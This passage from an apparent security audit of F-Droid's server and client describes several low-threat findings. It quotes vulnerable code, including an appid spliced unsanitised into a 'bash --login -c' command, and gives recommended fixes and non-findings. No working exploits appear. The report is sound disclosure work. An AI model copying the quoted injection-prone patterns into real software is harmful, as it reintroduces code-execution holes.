<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/nightly.py:287
subprocess.check_call(['fdroid', 'server', 'update', '--verbose'], cwd=repo_basedir)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">Impact: Difficult to trigger, but then possibly high impact due to code execution.</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Establish a list of all good paths once (during installation), store it in a file with secure permissions and use this to call the external programs.</div></div>
</div>
         <a name="f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.33</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-033 &#8212; Maliciously Crafted Appid Code Injection in Fdroidserver Build.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-033</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Maliciously crafted appids can be used for code injection. However in this case the code injection is happening in the build VM, where other attacker controlled code is executed willingly.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">In fdroidservers <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">build.py</span> there is an unsafe handling of appids on the buildserver:</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">./fdroidserver/build.py:217</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">cmdline += " %s:%s" % (app.id, build.versionCode)
chan.exec_command('bash --login -c "' + cmdline + '"')</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">This is similar to the code injection in drozer.py. However this is probably confined to the build VM and thus not significant, as the (maven,gradle, etc) buildscripts also have inherently code execution capabilities.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Low: This is confined to the build VM, in which the build scripts have code execution anyway.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate appids.</div></div>
</div>
         <a name="f34-bluetootheserver-java-file-in-response-without-size-of-type-check"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.34</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-034 &#8212; Missing file type and size validation</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-034</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Arbitrary file in response</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">BluetootheServer.java: File included in Response Without Size or Type Check</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">In file net/bluetooth/BluetoothServer.java, Bluetooth device prepares to send a file on BT socket without file size limit and file content format verification.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Lines 275-303:
275:                long fileLen = file.length();
...
...
291:                        final long dataLen = newLen;
292:                        FileInputStream fis = new FileInputStream(file) {
...
...
303:        res = createResponse(NanoHTTPD.Response.Status.PARTIAL_CONTENT, mime, fis);
</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Malicious file may be injected into an unsuspecting user's device, enabling attacker to exploit another vector.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Only allow certain types of files to be transmitted (whitelisting) if possible.</div>
     <div style="margin-bottom: 1.3cm; line-height: 6mm;">Limit the size of file to be transmitted, and warn the user for large files.</div>
</div>
</div>
         <a name="f36-no-mechanism-to-remove-root-ca-keys"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.35</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-035 &#8212; Hardcoded root CA keys</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-035</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Hardcoded keys</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">No Mechanism to Remove hardcoded Root CA Keys</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">In file fdroid/FDroidCertPins.java, the class FDroidCertPins defines default pinned root CA, and uses it for initialization, but does not provide a run-time removal of the keys. The only way to remove a root CA key is to build a new Fdroid client with modified list of keys.
    </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Data integrity compromise using older keys which may have expired or revoked.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">Provide key revocation list check. Alternatively, list the root CA keys in a separate file which can be updated independently.</div>
</div>
</div>
         <a name="f37-use-of-rot13-and-base64-encoding"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.36</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-036 &#8212; Use of weak methods for data protection</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-036</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Weak data protection</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Use of ROT13 and Base64 Encoding</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Provisioner.java uses rot13 + base64 encoding for obfuscation. Obfuscation is not a security feature.</div>
    <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response from developer:</span>lol, yup, ROT13 is just meant to "dissuade" people from trying to get those keys.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">False sense of security</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">If the data being protected is sensitive, stronger encryption methods should be used.</div>
</div>
</div>
         <a name="f38-untrusted-external-links"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.37</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-037 &#8212; Untrusted External Links</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-037</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Unverified remote resources</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">External links used without validation</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">In file RepoXMLHandler.java, several description items of a repo or app are externally sourced - such as icon, bitcoin wallet, litecoin wallet and donate link. A seemingly harmless app hosted in Fdroid can be used to guide a <span style="font-style: italic;">willing</span> but <span style="font-style: italic;">unsuspecting</span> donor to malicious sites.
    </div>
    <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response from developer:</span>Since there is a <a href="https://gitlab.com/fdroid/fdroiddata/merge_requests" style="color: #e2632a;">human review</a> of those URLs, and those URLs are committed to git, we have left those to be open without validation. There are also other URLs like home page, issue tracker, etc. I suppose we should show the full URL in the UI if they don't match a well known pattern.
    </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">User may be lured to visit malicious web sites/ resources which can lead to social engineering attacks as well as malware installation.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">Documented manual review of external links before accepting a MR/PR/update/patch should be in place, and warning should be displayed to user when they click on the external links.
    </div>
</div>
</div>
         <a name="f42-stronger-regular-expression-recommended"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.38</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-038 &#8212; Weak pattern matching filter</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #ffbf7f;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-038</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Weak regular expression</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Low</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Regular expression used for filtering file name entries in zipsigner appears to be permissive.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">In zipio/ZipInput.java file, regular expression for file name entries in zipsigner appears to be permissive.</div>
    <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">        if (path.startsWith("/")) path = path.substring(1);

        Pattern p = Pattern.compile( String.format("^%s([^/]+/?).*", path));
    </div></pre>
    <div style="margin-bottom: 5pt; line-height: 6mm;">Only '/' character appears to be disallowed. This can be strengthened to not allow special characters such as semi colon, pipe, quotes etc.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Potentially, a file name with special characters can trigger OS command injection.</div>
    <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Developer response:</span> I get your concern for other platforms, but shell scripts and exec calls are relatively rare in Android/Java space. The zip library is doing the right thing in terms of handling all valid filenames. So I think this is a hypothetical issue that would apply if some unsafe code did something with the ZIP file. </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">Regular expression pattern should be strengthened to not allow special characters such as semi colon, pipe, quotes etc. to avoid OS command injection attacks.
    </div>
</div>
</div>
      </div>
      <a name="nonFindings"></a><div style="margin-bottom: 1.3cm;">
         <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.2</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Non-Findings</div></td></tr></table></div>
         <div style="margin-bottom: 1.3cm; line-height: 6mm;">In this section we list some of the things that were tried but turned out to
                        be dead ends.</div>
                        <a name="f50--fdroid-client-exploiting-the-local-web-server-of-nearby-swap-to-navigate-directories"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.2.1</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">(fdroid Client) Exploiting the Local Web Server of "Nearby Swap" to Navigate Directories</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Tries multiple ways to navigate to local directories and files using the requests to HTTP server opened by Nearby Swap feature.
Apart from icons/ directory, no other directories were accessible.</div>
</div>
                        <a name="f51--fdroid-client-exploiting-exported-activities-and-broadcasts"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.2.2</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">(fdroid Client) Exploiting Exported Activities and Broadcasts</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Attempts were made to exploit the exported component of the application, but no exploitable vulnerability was discovered. Exported components:


org.fdroid.fdroid.views.ManageReposActivity,
org.fdroid.fdroid.AppDetails2,
org.fdroid.fdroid.privileged.install.InstallExtensionBootReceiver,
org.fdroid.fdroid.receiver.StartupReceiver,
org.fdroid.fdroid.receiver.PackageManagerReceiver,
org.fdroid.fdroid.receiver.WifiStateChangeReceiver</div>
</div>
                        <a name="f54--privilege-extension-static-analysis-of-apk"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.2.3</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">(Privilege Extension) Static Analysis of APK</div></td></tr></table></div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">No vulnerabilities were discovered in the static analysis of the apk. Static analysis tests for hardcoded critical information, local storage, logging etc.</div>
</div>
      </div>

   </div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Pentest Technical Summary &nbsp;&nbsp;&nbsp; <span><span>&#8226;</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="futurework"></a><div style="margin-bottom: 1.3cm;">
  <div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>5</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Future Work</div></td></tr></table></div>
  <div style="margin-bottom: 1.3cm; line-height: 6mm;">
      As Fdroid ecosystem grows and new features are added/revamped, it is recommended that Fdroid server and app go through code audit and pen-test periodically, as also when a significant update is made to the code base or when new dependencies are introduced in the ecosystem.
  </div>
</div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Future Work &nbsp;&nbsp;&nbsp; <span><span>&#8226;</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="conclusion"></a><div style="margin-bottom: 1.3cm;">
  <div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>6</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Conclusion</div></td></tr></table></div>

  <div style="margin-bottom: 5pt; line-height: 6mm;">Some issues were found in repomaker, however the impact of those are limited by the way repomaker is used. A few significant issues were found in fdroidserver, allowing running code in the build VM, in the fdroid host, and in the browsers of users. These issues are either from quite old code, or from new experimental code. Despite this there is signs of attempting to harden fdroidserver and to deploy defense-in-depth, this is commendable. The defensive mindset is a great asset, keep it up.
  </div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">Similarly, code audit of Fdroid client/app code and 3rd party dependencies also reveals some high impact and many moderate impact issues which need to be fixed. A few issues, such as use of TOFU and repo-swap features need a redesign for mitigation of the vulnerability.
  </div>
  <div style="margin-bottom: 5pt; line-height: 6mm;"> Significant exploitable issues were reported in Fdroid client pen-test leading to false trust and malicious app installation, along with redirect to malicious sites.</div>
  <div style="margin-bottom: 1.3cm; line-height: 6mm;"> We conclude that given the large number of issues reported, some of which are design issues, Fdroid team should significantly improve the security of Fdroid software (server, repomaker and app) on a high priority. </div>
</div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Conclusion &nbsp;&nbsp;&nbsp; <span><span>&#8226;</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="testteam"></a><div style="margin-bottom: 1.3cm;">
      <div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="120.95999999999998"><div style="line-height: 0.7cm;"><span> Appendix&nbsp;1</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Testing team</div></td></tr></table></div>
      <div><table style="border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Stefan Marsiske</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Stefan runs workshops on radare2, embedded hardware, lock-picking, soldering, gnuradio/SDR, reverse-engineering, and crypto topics. In 2015 he scored in the top 10 of the Conference on Cryptographic Hardware and Embedded Systems Challenge. He has run training courses on OPSEC for journalists and NGOs.
              </div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Abhinav Mishra</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>When he hacked the first application while doing his engineering graduation, back in 2009 ... he thought, this is cool.
               Now it has been 6+ years and Abhinav has been involved in hacking web, mobile and networks as a penetration tester.
               Together with numerous accolades from multiple organization, for responsible disclosures of vulnerabilities.
               He is also a part of Synack Red Team and Cobalt core team.  Has performed 100+ web, 50+ mobile applications and numerous network penetration tests.</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Mahesh Saptarshi</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Director, cyberSecurist Technologies. Mahesh is passionate about software security defences. He has performed a large number of pentests of enterprise, web and mobile applications. He has several US patents in the area of high availability and virtual machines technology.</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Melanie Rieback</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Melanie Rieback is a former Asst. Prof. of Computer Science from the
                            VU, who is also the co-founder/CEO of Radically Open Security.</div></td></tr></tbody></table></div>
   </div></div><a name="EndOfDoc"></a><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Testing team &nbsp;&nbsp;&nbsp; <span><span>&#8226;</span></span></div></div><br>